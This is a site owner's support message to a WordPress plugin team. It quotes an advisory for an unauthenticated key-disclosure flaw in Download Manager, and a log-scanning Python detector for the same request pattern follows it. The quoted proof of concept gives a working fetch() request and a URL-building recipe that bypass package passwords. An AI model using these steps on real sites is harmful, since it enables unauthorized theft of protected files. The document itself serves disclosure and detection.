Hello Download Manager Free Support Team,
I hope you are well. I would like to report a security issue that I have encountered in the latest version of the “Download Manager Free” plugin (version 3.2.76) which I recently updated on my WordPress website. This problem seems to be a vulnerability that allows attackers to access sensitive information without authentication, which is extremely concerning for the security of my website.
The vulnerability is described as follows:
[ Download Manager Pro < 6.3.0 – Unauthenticated Sensitive Information Disclosure
Description
The plugin leaks master key information without the need for a password, allowing attackers to download arbitrary password-protected package files.
Proof of Concept
– Create a password protected package containing one or more files.
– Navigate to the download page of the package (e.g. /download/package1)
– Inspect the “Download” button beside one of the packaged files. The HTML should look like this:
<button
  class="inddl btn btn-primary btn-sm"
  data-pid="123"
  data-file="12345678"
  rel="https://wpscan-vulnerability-test-bench.ddev.site/download/package1/?wpdmdl=123&ind=12345678"
  data-pass="#pass_113_1679405558600">
  <i class="fa fa-download"></i>
  Download
</button>
– Note the wpdmdl and ind URL parameters for later.
– Send a POST request to /wp-json/wpdm/validate-filepass:
fetch("/wp-json/wpdm/validate-filepass", {
  "headers": {
    "accept": "*/*",
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": "",
  "method": "POST",
  "credentials": "include"
}).then(response => response.text()).then(text => console.log(text));
– The response will look like the following:
{"success":true,"downloadurl":"\/wp-json\/wpdm\/validate-filepass?wpdmdl=0&_wpdmkey=abcdef&ind="}
– Construct a download URL as follows, using the above _wpdmkey parameter, as well as the wpdmdl and ind parameters from above:
https://wpscan-vulnerability-test-bench.ddev.site/download/package1/?wpdmdl=123&ind=12345678&_wpdmkey=abcdef
– See that the file may be downloaded from that URL, without any knowledge of its password. ]
Despite having updated the plugin to the latest available version (version 3.2.76), this issue still persists on my website. As a result, I am very concerned about the security of my site and the data of my users.
I kindly request your assistance and guidance in addressing this security issue effectively. Can you please confirm if you are aware of this vulnerability and if you are working on a solution? If so, when can we expect an update that addresses this problem?
The security of my website is of utmost importance, and I would appreciate any help you can provide to resolve this issue urgently. If additional information or access to my website is needed to investigate this problem, I am willing to provide it securely.
I look forward to your response and appreciate your attention to this critical security matter.
I’m sorry if my English is poor, I am Spanish and I am using ChatGPT to translate 🙂
Thank you and regards,
Saray
saray.mc@gmail.com
https://scrapstudio.es/
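
A log check for the request pattern in the quoted advisory, added here as an example (it is not part of the original post or of the plugin's code): it flags clients that POST to /wp-json/wpdm/validate-filepass with no request body and then fetch a URL carrying _wpdmkey. The log format (request Content-Length as the last field), the function name and the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed access-log format (not from the post):
#   client [time] "request line" status request-Content-Length
LINE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<clen>\d+|-)$')
ENDPOINT = "/wp-json/wpdm/validate-filepass"

# Constructed sample lines; client addresses are from documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 [21/Mar/2023:13:32:38 +0000] "GET /download/package1/ HTTP/1.1" 200 -
198.51.100.7 [21/Mar/2023:13:32:51 +0000] "POST /wp-json/wpdm/validate-filepass HTTP/1.1" 200 0
198.51.100.7 [21/Mar/2023:13:33:02 +0000] "GET /download/package1/?wpdmdl=123&ind=12345678&_wpdmkey=abcdef HTTP/1.1" 200 -
203.0.113.20 [21/Mar/2023:14:01:10 +0000] "POST /wp-json/wpdm/validate-filepass HTTP/1.1" 200 61
203.0.113.20 [21/Mar/2023:14:01:12 +0000] "GET /download/package1/?wpdmdl=123&ind=12345678&_wpdmkey=abcdef HTTP/1.1" 200 -
"""

def find_suspect_downloads(log_text):
    """Return (ip, wpdmdl, ind) for keyed downloads that follow an
    empty-body validate-filepass POST from the same client."""
    empty_posters = set()
    hits = []
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m or m["status"] != "200":
            continue  # unparsable line or unsuccessful request
        url = urlsplit(m["target"])
        if m["method"] == "POST" and url.path.rstrip("/") == ENDPOINT:
            # A real password submission carries a form body;
            # the request shown in the advisory has none.
            if m["clen"] in ("0", "-"):
                empty_posters.add(m["ip"])
            continue
        query = parse_qs(url.query)
        if (m["method"] == "GET" and "_wpdmkey" in query
                and "wpdmdl" in query and m["ip"] in empty_posters):
            hits.append((m["ip"], query["wpdmdl"][0], query.get("ind", [""])[0]))
    return hits

if __name__ == "__main__":
    for ip, pkg, ind in find_suspect_downloads(SAMPLE_LOG):
        print(f"review: {ip} fetched package {pkg} file {ind} "
              "after an empty-body validate-filepass POST")
```

Clients behind a shared address can produce false matches, so treat a hit as a prompt to review the download, not as proof.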